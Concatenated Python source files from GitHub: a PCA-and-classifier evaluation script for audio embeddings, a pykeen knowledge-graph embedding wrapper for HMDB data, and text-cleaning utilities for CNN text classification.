    plt.xticks(np.arange(0, 10, 1))
    plt.show()
def whiten(X,fudge=1E-18):
#Attempt to perform PCA whitening on the embeddings.
#Did not work properly and is therefore not used.
# the matrix X should be observations-by-components
# get the covariance matrix
Xcov = np.dot(X.T,X)
# eigenvalue decomposition of the covariance matrix
d, V = np.linalg.eigh(Xcov)
# a fudge factor can be used so that eigenvectors associated with
# small eigenvalues do not get overamplified.
D = np.diag(1. / np.sqrt(d+fudge))
# whitening matrix
W = np.dot(np.dot(V, D), V.T)
# multiply by the whitening matrix
X_white = np.dot(X, W)
return X_white, W
def embeddingPCA_manual(embeddings, dim):
    """Run a manual (NumPy-based) PCA over saved embeddings and score classifiers.

    For a range of variance thresholds, low-variance features are removed
    (sklearn ``VarianceThreshold``), the surviving features are standardized
    and projected onto the top ``dim`` principal components, and linear
    classifiers are fitted on the projection via ``linear_clf_embeddings_pca``.
    Also saves a histogram of per-embedding variance to ``variance_embeds.png``.

    Args:
        embeddings (list): Paths to ``.npy`` embedding files; the parent
            directory name encodes the class label (first three characters)
            -- assumed from the path-splitting below, TODO confirm layout.
        dim (int): Number of principal components to keep.

    Returns:
        pd.DataFrame: One row per threshold with feature counts and accuracies.
    """
    load_embeds, labels = [], []
    for embedding in embeddings:
        embed = np.load(embedding, allow_pickle=True)
        # Parent folder name encodes the sub-class label, e.g. "101".
        labels.append(embedding.split('/')[-2][:3])
        load_embeds.append(np.reshape(embed, (1024)))
    # Histogram of per-embedding variance, with the mean marked in red.
    variances = np.var(load_embeds, axis=1)
    mean_var = np.mean(variances)
    plt.figure(figsize=(8, 5))
    plt.hist(variances, color='lightblue', edgecolor='black', bins=20)
    plt.axvline(mean_var, color='r', linestyle='dashed', linewidth=2)
    plt.text(mean_var + 0.0005, 750, r'$\mu$ = {:.5f}'.format(mean_var))
    plt.xlabel('Variance')
    plt.ylabel('Count')
    plt.title('Variance of the embeddings')
    plt.savefig('variance_embeds.png')
    # Note: the initial columns are kept for output-schema compatibility even
    # though the rows appended below use the clfCV_*/SVC_* column names.
    scores = pd.DataFrame(columns=['threshold', 'num_features', 'clf', 'clfCV', 'reg', 'bayes', 'svc'])
    # Thresholds from 0.0000 to 0.0024 in steps of 0.0001.
    thresholds = np.arange(0.0000, 0.0025, 0.0001)
    # Labels are constant across iterations; convert to int once.
    int_labels = [int(label) for label in labels]
    load_embeds_cpy = load_embeds.copy()
    for threshold in thresholds:
        print(f'Performing PCA with threshold {threshold}\n')
        selector = VarianceThreshold(threshold=threshold)
        try:
            reduced = selector.fit_transform(load_embeds_cpy)
            # Standardize: center, then divide by std (guarding zero-variance
            # columns with a tiny epsilon to avoid division by zero).
            centered = reduced - np.mean(reduced, axis=0)
            std = np.std(centered, axis=0)
            std[std == 0] = 1e-10
            standardized = centered / std
            # Eigendecomposition of the covariance matrix, eigenvalues sorted
            # descending so the leading components come first.
            cov_mat = np.cov(standardized, rowvar=False)
            eigenvals, eigenvecs = np.linalg.eigh(cov_mat)
            order = np.argsort(eigenvals)[::-1]
            sort_eigenvecs = eigenvecs[:, order]
            # Project onto the top `dim` principal components.
            embed_transformed = np.dot(sort_eigenvecs[:, :dim].T, standardized.T).T
            clfCV_super, svc_super, clfCV_sub, svc_sub = linear_clf_embeddings_pca(embed_transformed, int_labels)
            row = {'threshold': round(threshold, 6),
                   'num_features': reduced.shape[1],
                   'clfCV_super': clfCV_super, 'SVC_super': svc_super,
                   'clfCV_sub': clfCV_sub, 'SVC_sub': svc_sub}
            # DataFrame.append was removed in pandas 2.0; concat is equivalent.
            scores = pd.concat([scores, pd.DataFrame([row])], ignore_index=True)
        except Exception as exc:
            # VarianceThreshold raises once a threshold removes every feature;
            # report the reason (the old bare `except:` hid it) and stop.
            print(f'Stopping at threshold {threshold}: {exc}')
            return scores
    return scores
def linear_clf_embeddings_pca(embeddings, labels):
    """Classify the embeddings using a linear classifier.

    Trains a cross-validated logistic regression and a linear SVM, each on two
    label granularities: the "super" class (label // 100) and the full
    sub-class label.

    Args:
        embeddings: PCA-transformed embedding matrix.
        labels: Integer sub-class labels of the embeddings.

    Returns:
        tuple: (logreg super acc, SVM super acc, logreg sub acc, SVM sub acc).
    """
    from sklearn.model_selection import train_test_split
    from sklearn.linear_model import LogisticRegressionCV
    from sklearn.svm import LinearSVC
    from sklearn.pipeline import make_pipeline
    from sklearn.preprocessing import StandardScaler

    x_train, x_test, y_train, y_test = train_test_split(
        embeddings, labels, test_size=0.2, random_state=42)
    # "Super" classes group sub-classes by the hundreds digit (101 -> 1).
    y_train_super = [int(lbl) // 100 for lbl in y_train]
    y_test_super = [int(lbl) // 100 for lbl in y_test]

    logreg_super = LogisticRegressionCV(cv=5, random_state=0, max_iter=500).fit(x_train, y_train_super)
    logreg_sub = LogisticRegressionCV(cv=5, random_state=0, max_iter=500).fit(x_train, y_train)
    logreg_super_acc = logreg_super.score(x_test, y_test_super)
    logreg_sub_acc = logreg_sub.score(x_test, y_test)

    # LinearSVC benefits from standardized features, hence the pipeline.
    svm_super = make_pipeline(StandardScaler(), LinearSVC(random_state=0, tol=1e-5))
    svm_sub = make_pipeline(StandardScaler(), LinearSVC(random_state=0, tol=1e-5))
    svm_super.fit(x_train, y_train_super)
    svm_sub.fit(x_train, y_train)
    svm_super_acc = svm_super.score(x_test, y_test_super)
    svm_sub_acc = svm_sub.score(x_test, y_test)

    return logreg_super_acc, svm_super_acc, logreg_sub_acc, svm_sub_acc
def linear_clf_embedding(embeddings, mode = "superclass"):
    """Function that takes the embeddings and trains a linear classifier on them.

    Labels are derived from the parent directory name of each embedding file:
    the first character for 'superclass', the first three for 'subclass'.

    Args:
        embeddings (list): Paths to .npy embedding files.
        mode (str): Classification labels to use. Must be either 'superclass'
            or 'subclass'.

    Returns:
        tuple: (LogisticRegressionCV accuracy, LinearSVC accuracy), or None if
        mode is invalid.
    """
    load_embeds, labels = [], []
    # NOTE: an unused max-embedding-length pass (which loaded every file a
    # second time) has been removed -- only this single load remains.
    for embedding in embeddings:
        embed = np.load(embedding, allow_pickle=True)
        if mode == "superclass":
            label = int(embedding.split('/')[-2][0])
        elif mode == "subclass":
            label = int(embedding.split('/')[-2][:3])
        else:
            print("Invalid classification mode. Must be either 'superclass' or 'subclass'.")
            return
        labels.append(label)
        load_embeds.append(embed)
    labels = np.array(labels)
    embeds = np.array(load_embeds)
    from sklearn.model_selection import train_test_split
    train_embeds, test_embeds, train_labels, test_labels = train_test_split(
        embeds, labels, test_size=0.2, random_state=42)
    from sklearn.linear_model import LogisticRegressionCV
    clfCV = LogisticRegressionCV(cv=5, random_state=0).fit(train_embeds, train_labels)
    clfCVscore = clfCV.score(test_embeds, test_labels)
    from sklearn.svm import LinearSVC
    from sklearn.pipeline import make_pipeline
    from sklearn.preprocessing import StandardScaler
    # Standardize features before the linear SVM.
    SVCclf = make_pipeline(StandardScaler(),
                           LinearSVC(random_state=0, tol=1e-5))
    SVCclf.fit(train_embeds, train_labels)
    SVCscore = SVCclf.score(test_embeds, test_labels)
    print(f"{mode} classification")
    print(tabulate([['Logistic Regression CV', clfCVscore], ['SVC', SVCscore]],
                   headers=['Classifier', 'Accuracy'], tablefmt='latex'))
    return clfCVscore, SVCscore
def plot_pca_scores(csv_path = 'output/embeddings/PCA_scores2.csv'):
    """Plot classifier accuracy against the variance threshold.

    Reads the score table written by the PCA run and saves a line plot to
    'output/embeddings/PCA_scores2.png'.

    Args:
        csv_path (str, optional): Path to the score CSV. Defaults to
            'output/embeddings/PCA_scores2.csv'.
    """
    df = pd.read_csv(csv_path)
    plt.figure(figsize=(10, 6))
    plt.tight_layout()
    # Solid lines: superclass accuracy; dashed lines: subclass accuracy.
    series = (('clfCV_super', 'Logistic Regression CV (Super)', 'orange', '-'),
              ('SVC_super', 'SVC (Super)', 'indigo', '-'),
              ('clfCV_sub', 'Logistic Regression CV (Sub)', 'orange', '--'),
              ('SVC_sub', 'SVC (Sub)', 'indigo', '--'))
    for column, label, color, style in series:
        plt.plot(df['threshold'], df[column], label=label, color=color, linestyle=style)
    plt.xlabel('Variance Threshold')
    plt.ylabel('Classifier Accuracy')
    plt.legend(title='Classification Algorithm')
    plt.savefig('output/embeddings/PCA_scores2.png')
if __name__ == "__main__":
    # Root folder whose sub-directories each hold one class's .npy embeddings.
    data_path = 'output/delta/embeddings/ECS50/'
    embeddings = []
    labels = []
    # get all the embeddings (one list of paths per class folder)
    for folder in os.listdir(data_path):
        if folder == '.DS_Store':
            continue
        embeddings.append([data_path + folder + '/' + file for file in os.listdir(data_path + folder) if file.endswith('.npy')])
        labels.append([file.split('-')[0] for file in os.listdir(data_path + folder) if file.endswith('.npy')])
    # flatten the lists (per-folder lists -> one flat list)
    labels = [item for sublist in labels for item in sublist]
    embeddings = [item for sublist in embeddings for item in sublist]
    # dim = 64 to compare with VAE
    dim = 64
    scores = embeddingPCA_manual(embeddings, dim)
    # save the scores to csv and plot the scores
    scores.to_csv('output/embeddings/PCA_scores_1_1.csv')
    plot_pca_scores('output/embeddings/PCA_scores_1_1.csv')
    # do linear classification on the embeddings
    linear_clf_embedding(embeddings, mode = "superclass")
linear_clf_embedding(embeddings, mode = "subclass") | magnusgp/LLAR | yamnet/PCA.py | PCA.py | py | 17,201 | python | en | code | 1 | github-code | 50 |
7285094270 | import pickle
import pykeen
from pykeen.datasets.base import PathDataset
import torch
from torch.optim import Adam
from pykeen.training import SLCWATrainingLoop,LCWATrainingLoop
from pykeen.evaluation import RankBasedEvaluator
import os
import numpy as np
from pykeen.models import ConvE,TransE,TransD,TransH,TransR,KG2E,RotatE,DistMult
import json
class KGEmbedding():
    """Knowledge-graph-embedding wrapper around pykeen: builds triples,
    trains/evaluates a KGE model, and exports entity/relation embeddings."""
    def __init__(self,model_name) -> None:
        # Name of the pykeen model to use, e.g. "TransE" or "ConvE".
        self.model_name=model_name
    def construct_triples(self,
                          train_path="data/TrainingSet.txt",
                          valid_path="data/EvaluationSet.txt",
                          test_path="data/TestSet.txt",
                          create_inverse_triples=True):
        """Construct triples from the provided training, testing and validation sets.
        Args:
            train_path (str, optional): Path to training set file. Defaults to "data/TrainingSet.txt".
            valid_path (str, optional): Path to validation set file. Defaults to "data/EvaluationSet.txt".
            test_path (str, optional): Path to testing set file. Defaults to "data/TestSet.txt".
            create_inverse_triples (bool, optional): Whether or not to create inverse triples. Defaults to True.
        Returns:
            tuple: Tuple containing training, validation and testing data.
        """
        # PathDataset parses the TSV triple files into pykeen TriplesFactory objects.
        triple_factor_data = PathDataset(training_path=train_path,
                                        testing_path=test_path,
                                        validation_path=valid_path,
                                        create_inverse_triples=create_inverse_triples)
        triple_factor_data_train = triple_factor_data.training
        triple_factor_data_test = triple_factor_data.testing
        triple_factor_data_val = triple_factor_data.validation
        # Also return the full dataset object (carries entity/relation id maps).
        return triple_factor_data_train, triple_factor_data_val, triple_factor_data_test, triple_factor_data
    # Save the xx_to_id / id_to_xx mapping files.
    def save_id_mapping(self, dir_path="data"):
        """Save id mapping of the constructed triples in JSON format to the specified directory.
        Args:
            dir_path (str, optional): Directory to save the files. Defaults to "data".
        Returns:
            None
        """
        _, _, _, triple_factor_data = self.construct_triples()
        if not os.path.exists(os.path.join(dir_path, self.model_name)):
            os.mkdir(os.path.join(dir_path, self.model_name))
        with open(os.path.join(dir_path, self.model_name, "entity_to_id.json"), "w") as f:
            json.dump(triple_factor_data.entity_to_id, f)
        # Inverse mapping: id -> entity name.
        with open(os.path.join(dir_path, self.model_name, "id_to_entity.json"), "w") as f:
            json.dump({i: j for j, i in triple_factor_data.entity_to_id.items()}, f)
        with open(os.path.join(dir_path, self.model_name, "relation_to_id.json"), "w") as f:
            json.dump(triple_factor_data.relation_to_id, f)
        # Inverse mapping: id -> relation name.
        with open(os.path.join(dir_path, self.model_name, "id_to_relation.json"), "w") as f:
            json.dump({i: j for j, i in triple_factor_data.relation_to_id.items()}, f)
# KGE训练
def Train_KGE(self,save_model=True):
if self.model_name=="ConvE":
KGE_model=ConvE
if self.model_name=="TransE":
KGE_model=TransE
if self.model_name=="TransD":
KGE_model=TransD
if self.model_name=="TransH":
KGE_model=TransH
if self.model_name=="TransR":
KGE_model=TransR
if self.model_name=="KG2E":
KGE_model=KG2E
if self.model_name=="RotatE":
KGE_model=RotatE
if self.model_name=="DistMult":
KGE_model=DistMult
triple_factor_data_train,triple_factor_data_vld,triple_factor_data_tst,triple_factor_data=self.construct_triples()
print(triple_factor_data.summarize())
self.model = KGE_model(
triples_factory=triple_factor_data_train,
entity_representations=[pykeen.nn.Embedding],
#entity_representations_kwargs=dict()
)
# Pick an optimizer from Torch
optimizer = Adam(params=self.model.get_grad_params())
# Pick a training approach (sLCWA or LCWA)
training_loop = SLCWATrainingLoop(
model=self.model,
triples_factory=triple_factor_data_train,
optimizer=optimizer,
)
# Train
_ = training_loop.train(
triples_factory=triple_factor_data_train,
num_epochs=100,
batch_size=256,
)
# print(self.model.entity_representations[0]._embeddings.weight.data[0])
# self.model.entity_representations[0]._embeddings.weight.data[0]=torch.tensor([0.]*50)
# print(self.model.entity_representations[0]._embeddings.weight.data[0])
# _ = training_loop.train(
# triples_factory=triple_factor_data_train,
# num_epochs=100,
# batch_size=256,
# )
print(self.model.entity_representations[0]._embeddings.weight.data[0])
if save_model:
if not os.path.exists("checkpoints/"):
os.mkdir("checkpoints")
torch.save(self.model,f"checkpoints/{self.model_name}.pkl")
return self.model
    # KGE evaluation
    def Evaluate_KGE(self,save_results=True):
        """Evaluate self.model on the test split with rank-based metrics.

        Args:
            save_results (bool, optional): Dump the metric dict as JSON to
                results/<model_name>_results.json. Defaults to True.

        Returns:
            The pykeen evaluation results object.
        """
        triple_factor_data_train,triple_factor_data_vld,triple_factor_data_tst,triple_factor_data=self.construct_triples()
        evaluator = RankBasedEvaluator()
        # Get triples to test
        mapped_triples = triple_factor_data_tst.mapped_triples
        # Evaluate; train/validation triples are passed as filters so known
        # true triples do not count as ranking errors (filtered setting).
        results = evaluator.evaluate(
            model=self.model,
            mapped_triples=mapped_triples,
            batch_size=1024,
            additional_filter_triples=[
                triple_factor_data_train.mapped_triples,
                triple_factor_data_vld.mapped_triples,
            ],
        )
        print(results.data)
        if save_results:
            # Metric keys may be tuples; stringify them for JSON.
            result_data_json = json.dumps({str(k): results.data[k] for k in results.data.keys()}, indent=4, ensure_ascii=False)
            if not os.path.exists("results/"):
                os.mkdir("results")
            write_res_pth = f"results/{self.model_name}_results.json"
            with open(write_res_pth, "w") as f:
                f.write(result_data_json)
                f.close()
        return results
    # Save all entity and relation embeddings as .npy arrays.
    def save_all_embeddings(self):
        if not os.path.exists("embeddings/"):
            os.mkdir("embeddings")
        np.save(f"embeddings/{self.model_name}_Entity_Embedding.npy",self.model.entity_representations[0]._embeddings.weight.data.numpy())
        np.save(f"embeddings/{self.model_name}_Relation_Embedding.npy",self.model.relation_representations[0]._embeddings.weight.data.numpy())
# 保存所有HMDB化合物的embedding
def save_hmdb_embeddings(self):
with open(f"data/{self.model_name}/entity_to_id.json","r") as f:
entity_to_id=json.load(f)
with open(f"data/{self.model_name}/id_to_entity.json","r") as f:
id_to_entity=json.load(f)
HMDBs=[i for i in entity_to_id.keys() if "HMDB" in i]
HMDB_ids=[entity_to_id[i] for i in HMDBs]
entity_embeddings=np.load(f"embeddings/{self.model_name}_Entity_Embedding.npy")
HMDB_embedding_dict={}
for i in HMDB_ids:
HMDB_embedding_dict[id_to_entity[str(i)]]=entity_embeddings[i]
if not os.path.exists("results/"):
os.mkdir("results")
with open(f"results/{self.model_name}_HMDB_Embedding.pkl","wb") as f:
pickle.dump(HMDB_embedding_dict,f)
    # Save embeddings grouped by the requested entity categories.
    def save_multiple_categories_embedding(self,categories):
        """Pickle per-category entity embeddings to results/.

        NOTE(review): this method reads ``self.entity_path``, which is never
        assigned in ``__init__`` -- calling it without setting that attribute
        first raises AttributeError. Confirm where entity_path should be set.
        """
        with open(f"data/{self.model_name}/entity_to_id.json","r") as f:
            entity_to_id=json.load(f)
        with open(f"data/{self.model_name}/id_to_entity.json","r") as f:
            id_to_entity=json.load(f)
        # Entity list file: tab-separated lines of (entity, category) --
        # assumed from the split below, TODO confirm the file format.
        with open(self.entity_path, newline='', encoding='utf-8') as f:
            entity_list = f.readlines()
        entity_list = [i.strip("\r\n").split("\t") for i in entity_list]
        entities={}
        # Group entity ids by category, keeping only requested categories
        # that actually appear in the id mapping.
        for entity in entity_list:
            if entity[1] in categories and entity[0] in entity_to_id.keys():
                if entity[1] not in entities.keys():
                    entities[entity[1]] = [entity_to_id[entity[0]]]
                else:
                    entities[entity[1]].append(entity_to_id[entity[0]])
        entity_embeddings=np.load(f"embeddings/{self.model_name}_Entity_Embedding.npy")
        entity_embeddings_dict={}
        for category in entities.keys():
            category_embedding={}
            for entity_id in entities[category]:
                category_embedding[id_to_entity[str(entity_id)]]=entity_embeddings[entity_id]
            entity_embeddings_dict[category]=category_embedding
        with open(f"results/{self.model_name}_{'_'.join(categories)}_Embedding.pkl","wb") as f:
            pickle.dump(entity_embeddings_dict,f)
    # KGE pipeline: id mapping -> train -> export embeddings -> evaluate.
    def KGE_model_pipeline(self,eval_model=True,save_model=True,save_results=True,save_embeddings=True,save_HMDB_embedding=True,save_multiple_categories_embedding=None,save_id_mapping=True):
        if save_id_mapping:
            self.save_id_mapping(dir_path="data")
        self.Train_KGE(save_model=save_model)
        if save_embeddings:
            self.save_all_embeddings()
        if save_HMDB_embedding:
            self.save_hmdb_embeddings()
        # If a list of categories is given, also export per-category embeddings.
        if save_multiple_categories_embedding:
            self.save_multiple_categories_embedding(categories=save_multiple_categories_embedding)
        if eval_model:
self.Evaluate_KGE(save_results=save_results) | PKU-BDBA/HMKG-Progress | HMKG/hmkg/KGE/construct_triples.py | construct_triples.py | py | 10,121 | python | en | code | 1 | github-code | 50 |
8462259752 | import numpy as np
np.random.seed(0)
def create_data(points, classes):
    """Generate the classic "spiral" toy dataset.

    Each class is one arm of a spiral with `points` samples; the angle gets
    Gaussian noise so the arms overlap slightly.
    """
    features = np.zeros((points * classes, 2))
    targets = np.zeros(points * classes, dtype='uint8')
    for label in range(classes):
        rows = slice(points * label, points * (label + 1))
        radius = np.linspace(0.0, 1, points)
        theta = np.linspace(label * 4, (label + 1) * 4, points)
        theta = theta + np.random.randn(points) * 0.2
        features[rows, 0] = radius * np.sin(theta * 2.5)
        features[rows, 1] = radius * np.cos(theta * 2.5)
        targets[rows] = label
    return features, targets
import matplotlib.pyplot as plt
# Generate 100 points for each of 3 spiral classes and visualize them.
X, y = create_data(100, 3)
plt.scatter(X[:,0], X[:,1])
plt.show()
# Same scatter, colored by class label.
plt.scatter(X[:,0], X[:,1], c=y, cmap="brg")
plt.show()
class Layer_Dense:
    """Fully connected layer: output = inputs @ weights + biases."""
    def __init__(self, n_inputs, n_neurons):
        # Small random weights shaped (inputs, neurons) so forward() needs no
        # transpose; biases start at zero.
        self.weights = 0.10 * np.random.randn(n_inputs, n_neurons)
        self.biases = np.zeros((1, n_neurons))
    def forward(self, inputs):
        """Store the affine transform of `inputs` in self.output."""
        self.output = np.dot(inputs, self.weights) + self.biases
class Activation_ReLU:
    """Rectified Linear Unit activation: max(0, x) element-wise."""
    def forward(self, inputs):
        # Clamp negatives to zero; positives pass through unchanged.
        self.output = np.clip(inputs, 0, None)
# NOTE(review): layer1 expects 4 input features but X from create_data has 2
# columns -- this forward pass looks shape-mismatched; confirm intent.
layer1 = Layer_Dense(4, 5)
layer2 = Layer_Dense(5, 2)
layer1.forward(X)
print(layer1.output)
# Feed the first layer's output through the second layer.
layer2.forward(layer1.output)
print(layer2.output)
| CocolinoFan/Learning | NeuralNetwork/Neural_Networks_from_Scratch_P_5.py | Neural_Networks_from_Scratch_P_5.py | py | 1,184 | python | en | code | 0 | github-code | 50 |
33306271149 | """
Converter for dicom and nifti import.
Convert dicom to nifti.
Get the main modals using NiftiGetter, which is based on globbing.
Inherite NiftiGetter to use with specific converted raw nifti data.
"""
import os
import subprocess
import fnmatch
import logging
import pydicom
from mmdps import rootconfig
from mmdps.util import path, loadsave
from mmdps.dms import dicominfo
def gen_scan_info(infolder, outfolder):
	"""
	Generate scan_info.json file from dicom files.
	Use the first file under infolder that parses as DICOM.
	"""
	dicom_file = None
	for dirpath, dirnames, filenames in os.walk(infolder):
		for filename in filenames:
			candidate = os.path.join(dirpath, filename)
			try:
				pydicom.read_file(candidate)
			except Exception:
				# Not a readable DICOM file; try the next one.
				continue
			# BUGFIX: remember the file that actually parsed. The old code
			# kept looping, so `filename` ended up being the LAST directory
			# entry rather than the one that was successfully read.
			dicom_file = candidate
			break
		if dicom_file is not None:
			break
	if dicom_file is not None:
		di = dicominfo.DicomInfo(dicom_file)
		d = di.get_scan_info()
		scanInfoFile = os.path.join(outfolder, 'scan_info.json')
		loadsave.save_json_ordered(scanInfoFile, d)
def convert_dicom_to_nifti(infolder, outfolder):
	"""
	Convert DICOM to raw NIFTI.
	The infolder should be the DICOM folder.
	The outfolder will be the converted NIFTI folder.
	the ret is the conversion program return value. 0 typically indicates success.
	"""
	# Start from a clean output folder.
	path.rmtree(outfolder)
	path.makedirs(outfolder)
	# Write scan_info.json alongside the converted NIFTI files.
	gen_scan_info(infolder, outfolder)
	# Run dcm2nii with gzip output (-z y); cwd is set so the tool can find
	# its own resources next to the executable.
	ret = subprocess.call([rootconfig.path.dcm2nii, '-z', 'y', '-o', outfolder, infolder],
						  cwd=os.path.dirname(rootconfig.path.dcm2nii))
	print(outfolder, ret)
	return ret
class NiftiGetter:
	"""Locate specific modality files among converted raw nii files."""
	def __init__(self, niftifolder):
		"""Init with the folder that contains nii files."""
		self.niftifolder = niftifolder
		self._files = os.listdir(self.niftifolder)
	def fnmatch_all(self, pat):
		"""Return full paths of every file in the folder matching the pattern."""
		return [os.path.join(self.niftifolder, name)
				for name in self._files if fnmatch.fnmatch(name, pat)]
	def fnmatch_one(self, pat):
		"""Return the single file matching the pattern, or None with a warning."""
		matches = self.fnmatch_all(pat)
		if len(matches) == 1:
			return matches[0]
		if not matches:
			logging.warning('No file match: {}: {}'.format(pat, self.niftifolder))
			print('No file match:', pat)
			return None
		logging.warning('More than one match: {} {}: {}'.format(pat, matches, self.niftifolder))
		print('More than one match:', pat, matches)
		return None
	def get_T1(self):
		"""Get T1 NIFTI file path."""
		return self.fnmatch_one('*T1*.nii.gz')
	def get_T2(self):
		"""Get T2 NIFTI file path."""
		return self.fnmatch_one('*T2*.nii.gz')
	def get_BOLD(self):
		"""Get BOLD NIFTI file path."""
		return self.fnmatch_one('*BOLD*.nii.gz')
	def get_DWI(self):
		"""Get DWI NIFTI file, bval file and bvec file, in a tuple.
		Validate with all(dwifiles) == True
		"""
		patterns = ('*DWI*.nii.gz', '*DWI*.bval', '*DWI*.bvec')
		return tuple(self.fnmatch_one(p) for p in patterns)
	def get_ScanInfo(self):
		"""Get path of the scan info json file."""
		return os.path.join(self.niftifolder, 'scan_info.json')
class ChanggungNiftiGetter(NiftiGetter):
	"""NiftiGetter specialized for the Changgung scanner's sequence names."""
	def __init__(self, niftifolder):
		super().__init__(niftifolder)
	def get_T1(self):
		"""Get the T1 (Sag 3D BRAVO) NIFTI file path."""
		return self.fnmatch_one('*OSag_3D_T1BRAVO*.nii.gz')
	def get_T2(self):
		"""Get the T2 (Ax PROPELLER) NIFTI file path."""
		return self.fnmatch_one('*OAx_T2_PROPELLER*.nii.gz')
	def get_BOLD(self):
		"""Get the resting-state BOLD NIFTI file path."""
		return self.fnmatch_one('*BOLD-rest*.nii.gz')
	def get_DWI(self):
		"""Get DWI (nii, bval, bvec) as a tuple, or None if any is missing."""
		nii = self.fnmatch_one('*DTI_24_Directions*.nii.gz')
		bval = self.fnmatch_one('*DTI_24_Directions*.bval')
		bvec = self.fnmatch_one('*DTI_24_Directions*.bvec')
		dwifiles = (nii, bval, bvec)
		# Unlike the base class, return None unless all three files exist.
		if all(dwifiles):
			return dwifiles
		else:
			return None
| geyunxiang/mmdps | mmdps/dms/converter.py | converter.py | py | 3,644 | python | en | code | 4 | github-code | 50 |
6597578574 | # -*- coding: utf-8 -*-
import uuid
"""
Classes for Route 53 domains.
James Reed jdreed1954@hotmail.com
Cell: 303-570-4927
Centennial Data Science
"""
class DomainManager:
    """Manage a Route 53 domain."""
    def __init__(self, session):
        """Create DomainManager object from a boto3 session."""
        self.session = session
        self.client = self.session.client('route53')

    def get_hosted_zones(self):
        """Return all hosted zones, following pagination."""
        zones = []
        paginator = self.client.get_paginator('list_hosted_zones')
        for page in paginator.paginate():
            for zone in page['HostedZones']:
                zones.append(zone)
        return zones

    def list_hosted_zones(self):
        """Print a formatted list of all hosted zones."""
        zones = self.get_hosted_zones()
        print("\n\n ***************** All Hosted Zones ************************\n")
        for zone in zones:
            print("Zone: ", zone, "\n")
        return

    def get_public_hosted_zones(self):
        """Return only the public (non-private) hosted zones."""
        return [z for z in self.get_hosted_zones()
                if not z['Config']['PrivateZone']]

    def list_public_hosted_zones(self):
        """Print a formatted list of public hosted zones."""
        for zone in self.get_public_hosted_zones():
            print(zone, "\n")
        return

    def get_a_records(self, zone):
        """Return list of alias A records from zone."""
        a_recs = []
        response = self.client.list_resource_record_sets(
            HostedZoneId=zone['Id'],
            StartRecordName=".",
            StartRecordType='A',
            StartRecordIdentifier=' '
        )
        # Only alias A records carry an AliasTarget block.
        for rrs in response['ResourceRecordSets']:
            if rrs['Type'] == 'A' and 'AliasTarget' in rrs:
                target = rrs['AliasTarget']
                a_recs.append([{'Name': rrs['Name'],
                                'HostedZoneId': target['HostedZoneId'],
                                'DNSName': target['DNSName'],
                                'EvaluateTargetHealth': target['EvaluateTargetHealth']}])
        return a_recs

    def find_hosted_zone(self, domain_name):
        """Find the hosted zone whose name is a suffix of domain_name."""
        paginator = self.client.get_paginator('list_hosted_zones')
        for page in paginator.paginate():
            for zone in page['HostedZones']:
                # Zone names end with a trailing dot; strip it before matching.
                if domain_name.endswith(zone['Name'][:-1]):
                    return zone
        return None

    def create_hosted_zone(self, domain_name):
        """Create a hosted zone for the registrable part of domain_name."""
        # BUGFIX: the old code joined `list + '.'`, which is a TypeError;
        # append the trailing dot after joining the last two labels.
        zone_name = '.'.join(domain_name.split('.')[-2:]) + '.'
        print(zone_name)
        return self.client.create_hosted_zone(
            Name=zone_name,
            CallerReference=str(uuid.uuid4())
        )

    def create_arec_domain_record(self, zone, domain_name, endpoint):
        """Create (UPSERT) an alias A record pointing at the endpoint."""
        # BUGFIX: the Route 53 client method is change_resource_record_sets
        # (the old name change_resource_sets does not exist on the client).
        return self.client.change_resource_record_sets(
            HostedZoneId=zone['Id'],
            ChangeBatch={
                'Comment': 'Created by Resource Automation.',
                'Changes': [{
                    'Action': 'UPSERT',
                    'ResourceRecordSet': {
                        'Name': domain_name,
                        'Type': 'A',
                        'AliasTarget': {
                            'HostedZoneId': endpoint.zone,
                            'DNSName': endpoint.host,
                            'EvaluateTargetHealth': False
                        }
                    }
                }]
            }
        )
| reed54/route53 | aState/domain.py | domain.py | py | 3,937 | python | en | code | 0 | github-code | 50 |
42201942444 | import numpy as np
import datetime
import itertools
import pickle
from collections import Counter
import re
"""
Code adapted from https://github.com/dennybritz/cnn-text-classification-tf
"""
def clean_str(string):
    """
    Tokenization/string cleaning for input.
    Replaces characters outside a small ASCII whitelist with spaces,
    tokenizes, then strips and lowercases.
    Originally taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py
    """
    whitelisted = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
    return tokenize(whitelisted).strip().lower()
def tokenize(string):
    """
    Tokenize English strings: split common contractions, surround
    punctuation with spaces, then collapse runs of whitespace.
    """
    # (pattern, replacement) pairs, applied in this exact order.
    rules = (
        (r"\'s", " \'s"),
        (r"\'ve", " \'ve"),
        (r"n\'t", " n\'t"),
        (r"\'re", " \'re"),
        (r"\'d", " \'d"),
        (r"\'ll", " \'ll"),
        (r",", " , "),
        (r"!", " ! "),
        (r"\(", " ( "),
        (r"\)", " ) "),
        (r"\?", " ? "),
        (r"\s{2,}", " "),
    )
    for pattern, replacement in rules:
        string = re.sub(pattern, replacement, string)
    return string
def normalize_sentence_length(sentences, padding_word='<PAD/>', max_length_words = None):
    """
    Normalizes lengths to max_length. max_length = None, normalizes to max sentence length.
    Pads shorter sentences using the padding_word.
    Cuts longer sentences at max_length number of words.
    sentences - list of sentence where each sentence is a list of words. eg. [['foo','bar'], ['fo2','bar2']]
    """
    if max_length_words is None:
        max_length_words = max(len(s) for s in sentences)
    normalized = []
    for sentence in sentences:
        # Pad up to the target length (no-op when already long enough),
        # then truncate to exactly the target length.
        padded = sentence + [padding_word] * (max_length_words - len(sentence))
        normalized.append(padded[:max_length_words])
    return normalized
def raw_text_to_sentence(text):
    """Clean raw text and split it into a list of word tokens."""
    return clean_str(text).split(" ")
def build_vocab(sentences):
    """
    Builds a vocabulary mapping from word to index based on the sentences.
    Words are indexed in descending frequency order (most common word is 0).
    Returns vocabulary mapping and inverse vocabulary mapping.
    """
    print('building vocab...')
    word_counts = Counter(itertools.chain(*sentences))
    # Index -> word, ordered most common first.
    vocabulary_inv = [word for word, _ in word_counts.most_common()]
    # Word -> index.
    vocabulary = {word: index for index, word in enumerate(vocabulary_inv)}
    return [vocabulary, vocabulary_inv]
def build_input_data(sentences, labels, vocabulary, vocab_inv):
    """
    Maps sentences to index vectors based on vocabulary.
    Maps binary labels to 1 hot vectors, 0 -> [1,0], 1 -> [0,1]
    Returns np.arrays plus the (unchanged) vocabularies.
    """
    x = np.array([[vocabulary[word] for word in sentence] for sentence in sentences])
    one_hot = ([1, 0], [0, 1])
    y = np.array([one_hot[1] if label else one_hot[0] for label in labels])
    return x, y, vocabulary, vocab_inv
